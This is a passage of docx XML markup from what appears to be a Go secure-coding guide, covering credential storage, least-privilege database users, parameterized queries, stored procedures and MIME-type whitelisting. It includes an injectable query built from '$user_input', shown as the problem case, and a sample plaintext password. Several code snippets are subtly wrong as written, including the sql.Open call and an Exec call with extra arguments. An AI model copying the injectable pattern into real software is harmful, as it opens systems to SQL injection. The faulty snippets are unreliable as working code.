        <w:t xml:space="preserve"> &lt;-osSignal:
            p.cancel()
        }
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Optionally wait for N milliseconds before calling os.Exit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    }()
    err =  p.doOperation()
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        log.Fatal(err)
    }
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> (p *program) doOperation() error {
    ctx, cancel := context.WithTimeout(p.base, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> * time.Second)
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> cancel()
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    err := p.db.QueryRowContext(ctx, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT VERSION();"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">).Scan(&amp;version)
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> fmt.Errorf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"unable to read version %v"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, err)
    }
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Connected to:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, version)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="80" w:name="Connection_string_protection"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Connection string protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>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2"/>
        </w:rPr>
        <w:t>/home/public_html/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, consider </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>/home/private/configDB.xml</w:t>
      </w:r>
      <w:r>
        <w:t>: a protected area.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 17"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">connectionDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">serverDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">serverDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">userDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">f00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">userDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">passDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">f00?bar#ItsP0ssible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">passDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">connectionDB</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Then you can call the configDB.xml file on your Go file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">configFile, _ := os.Open(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"../private/configDB.xml"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>After reading the file, make the database connection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">db, _ := sql.Open(serverDB, userDB, passDB)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Of course, if the attacker has root access, he will be able to see the file. Which brings us to the most cautious thing you can do - encrypt the file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="81" w:name="Database_Credentials"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Database Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>You should use different credentials for every trust distinction and level, for example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Read-only user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Guest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>That way if a connection is being made for a read-only user, they could never mess up with your database information because the user actually can only read the data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="82" w:name="Database_Authentication"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Database Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="83" w:name="Access_the_database_with_minimal_privilege"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
      </w:pPr>
      <w:r>
        <w:t>Access the database with minimal privilege</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If your Go web application only needs to read data and doesn't need to write information, create a database user whose permissions are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r>
        <w:t>. Always adjust the database user according to your web applications needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="84" w:name="Use_a_strong_password"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Use a strong password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When creating your database access, choose a strong password. You can use password managers to generate a strong password, or use online web applications that do the same for you - </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Strong Password Generator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="85" w:name="Remove_default_admin_passwords"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Remove default admin passwords</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Most DBS have default accounts and most of them have no passwords on their highest privilege user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For example, MariaDB, and MongoDB use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="86" w:name="Parameterized_Queries"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Parameterized Queries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Input Validation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index2_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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87" w:name="Flow"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>The developer prepares the statement (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Stmt</w:t>
      </w:r>
      <w:r>
        <w:t>) on a connection in the pool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Stmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object remembers which connection was used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the application executes the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">customerName := r.URL.Query().Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
db.Exec(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"UPDATE creditcards SET name=? WHERE customerId=?"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, customerName, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">233</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">90</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Sometimes a prepared statement is not what you want. There might be several reasons for this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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27"/>
        </w:numPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The statements aren’t reused enough to make them worthwhile, and security issues are handled in another layer of our application stack (See: </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index1_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Input Validation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index2_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Output Encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>), so performance as seen above is undesired.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="88" w:name="Stored_Procedures"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>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7"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> tblUsers </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> userId = $user_input
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Besides the problems of </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index1_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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7"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PROCEDURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> db.getName @userId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, lastname </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> tblUsers </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> userId = @userId
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Which you can run just by using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXEC db.getName @userId = 14
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This way you know for sure that user John only sees </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>lastname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the users he requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stored procedures are not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>bulletproof</w:t>
      </w:r>
      <w:r>
        <w:t>, but they create a new layer of protection to your web application. They give DBAs a big advantage over controlling permissions (e.g. users can be limited to specific rows/data), and even better server performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="89" w:name="File_Management"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>File Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first precaution to take when handling files is to make sure the users are not allowed to directly supply data to any dynamic functions. In languages like PHP, passing user data to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>dynamic include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functions, is a serious security risk. Go is a compiled language, which means there are no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functions, and libraries aren't usually loaded dynamically</w:t>
      </w:r>
      <w:hyperlink w:anchor="1___Go_1_8_does_allow_dynamic_loading_now__via_th___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="90" w:name="1"/>
          <w:t>1</w:t>
          <w:bookmarkEnd w:id="90"/>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0"/>
        </w:rPr>
        <w:t>whitelisting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). This check can be made using the following Go function that detects MIME types: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>func DetectContentType(data []byte) string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Below you find the relevant parts of a simple program to read and compute filetype (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text1"/>
        </w:rPr>
        <w:t>filetype.go</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">{...}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Write our file to a buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Why 512 bytes? See http://golang.org/pkg/net/http/#DetectContentType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
buff := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
_, err = file.Read(buff)
{...}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//Result - Our detected filetype</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
filetype := http.DetectContentType(buff)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>After identifying the filetype, an additional step is required to validate the filetype against a whitelist of allowed filetypes. In the example, this is achieved in the following section:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">{...}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> filetype {
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"image/jpeg"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
